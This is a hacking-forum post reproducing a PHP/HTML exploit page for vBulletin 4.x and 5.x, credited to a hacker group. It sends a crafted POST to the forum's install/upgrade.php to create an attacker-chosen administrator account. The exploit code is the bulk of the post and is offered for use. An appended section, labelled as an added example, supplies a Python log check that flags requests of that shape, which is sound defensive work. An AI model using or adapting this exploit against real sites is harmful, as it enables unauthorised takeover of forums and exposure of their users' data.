HackerTop
https://hackertop.org/

vBulletin v4.x.x and 5.x.x Shell Upload / Remote Code Execut
https://hackertop.org/viewtopic.php?f=6&t=14

Author:  admin [ Sun Jul 24, 2016 12:04 pm ]
Post subject:  vBulletin v4.x.x and 5.x.x Shell Upload / Remote Code Execut

Code:
<html xmlns="http://www.w3.org/1999/xhtml"><head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8">
<title>vBulletin 0day</title>
<style type="text/css">
<!--
body {
  background-color: #000;
  text-align: center;
  color: #063;
  font-size: large;
}
.a { font-size: 24px; }
.f { color: #060; }
.gbf { color: #F00; }
.dd { color: #F00; }
.w { font-size: large; }
a:link { text-decoration: none; }
a:visited { text-decoration: none; }
a:hover { text-decoration: none; }
a:active { text-decoration: none; }
-->
</style></head><body>
<p class="a">
<h1><span class="gbf">vBulletin</span> 4.x.x and 5.x.x Upgrade 0day Exploit</h1>
<br>Created by: 1337
<br>Found on: 08/22/2013
<br>Website: http://www.madleets.com
</p>
<br>
<?php
//extract data from the post
if(isset($_POST['submit'])){
extract($_POST);
//set POST variables
$url = $_POST['url'];
$fields = array(
'ajax' => urlencode('1'),
'version' => urlencode('install'),
'checktable' => urlencode('false'),
'firstrun' => urlencode('false'),
'step' => urlencode('7'),
'startat' => urlencode('0'),
'only' => urlencode('false'),
'customerid' => urlencode($_POST['customerid']),
'options[skiptemplatemerge]' => urlencode('0'),
'response' => urlencode('yes'),
'htmlsubmit' => urlencode('1'),
'htmldata[username]' => urlencode($_POST['username']),
'htmldata[password]' => urlencode($_POST['password']),
'htmldata[confirmpassword]' => urlencode($_POST['password']),
'htmldata[email]' => urlencode($_POST['email'])
);
//url-ify the data for the POST
foreach($fields as $key=>$value) { $fields_string .= $key.'='.$value.'&'; }
rtrim($fields_string, '&');
//open connection
$ch = curl_init();
//set the url, number of POST vars, POST data
curl_setopt($ch,CURLOPT_URL, $url);
curl_setopt($ch,CURLOPT_POST, count($fields));
curl_setopt($ch,CURLOPT_POSTFIELDS, $fields_string);
curl_setopt($ch, CURLOPT_COOKIESESSION, TRUE);
curl_setopt($ch, CURLOPT_COOKIE, 'bbcustomerid='.$_POST['customerid'] );
//execute post
$result = curl_exec($ch);
//close connection
curl_close($ch);
exit();
}
?>
<center>
<form name="sploit" method="POST" action="<?php echo $_SERVER['REQUEST_URI']; ?>">
<span>Example:http://test.com/forum/install/upgrade.php</span><br>
<span>Website:</span>
<input name="url" type="text" tabindex="1" size="60" />
<br>
<span>Customer ID:</span>
<input name="customerid" type="text" tabindex="2" size="40" />
<br>
<span>Username:</span>
<input name="username" type="text" tabindex="3" size="40" />
<br>
<span>Password:</span>
<input name="password" type="text" tabindex="4" size="40" />
<br>
<span>Email:</span>
<input name="email" type="text" tabindex="5" maxlength="40" />
 
<input name="submit" type="submit" value="Inject Admin">
</form>
</center>
<p class="a">------------------------------------------------------------------------------------------------------------------</p>
<p class="a">We are L33t Pakistani H4x0rZ | MaDLeeTs TeaM </p>
<p class="a">------------------------------------------------------------------------------------------------------------------</p>
</div>
</pre>
<p class="a">&nbsp;</p>
<p align="center">
</body></html>
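
Added example, not part of the original post: a Python check that flags HTTP requests shaped like the POST the script above sends to install/upgrade.php (fixed version=install, step=7 and htmlsubmit=1, plus htmldata[...] account fields). The record layout, the classify and scan names and the sample requests are constructed assumptions, and it presumes a WAF or reverse-proxy log that records request bodies.

```python
# Added example: flag requests shaped like the POST built by the script above.
# Records are constructed; a real deployment would read them from a WAF or
# reverse-proxy audit log that captures request bodies (assumption).
from urllib.parse import parse_qs, urlsplit

# Fields the posted script always sends, with the fixed values it uses.
FIXED_FIELDS = {"version": "install", "step": "7", "htmlsubmit": "1"}
# Fields that carry the account the request asks the installer to create.
ACCOUNT_FIELDS = ("htmldata[username]", "htmldata[password]", "htmldata[email]")


def classify(method, url, body):
    """Return 'alert', 'review' or 'ok' for one HTTP request."""
    path = urlsplit(url).path.lower()
    if not path.endswith("/install/upgrade.php"):
        return "ok"
    if method.upper() != "POST":
        return "review"  # installer script is exposed and being requested
    form = parse_qs(body, keep_blank_values=True)
    fixed = all(form.get(k, [None])[-1] == v for k, v in FIXED_FIELDS.items())
    account = any(k in form for k in ACCOUNT_FIELDS)
    return "alert" if fixed and account else "review"


# Constructed sample records: (client, method, url, body)
SAMPLES = [
    ("203.0.113.7", "POST", "/forum/install/upgrade.php",
     "ajax=1&version=install&step=7&customerid=PLACEHOLDER&htmlsubmit=1"
     "&htmldata%5Busername%5D=newadmin&htmldata%5Bpassword%5D=x"
     "&htmldata%5Bemail%5D=a%40example.com"),
    ("198.51.100.4", "GET", "/forum/install/upgrade.php", ""),
    ("198.51.100.9", "POST", "/forum/login.php", "do=login&username=bob"),
    ("192.0.2.15", "POST", "/forum/install/upgrade.php", "step=2"),
]


def scan(records):
    """Return (client, verdict) for every record that is not 'ok'."""
    verdicts = [(client, classify(m, u, b)) for client, m, u, b in records]
    return [(c, v) for c, v in verdicts if v != "ok"]


if __name__ == "__main__":
    for client, verdict in scan(SAMPLES):
        print(f"{verdict:6} {client}")
```

Any "review" hit also means the install directory is still reachable from the network, which is worth checking on its own.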

All times are UTC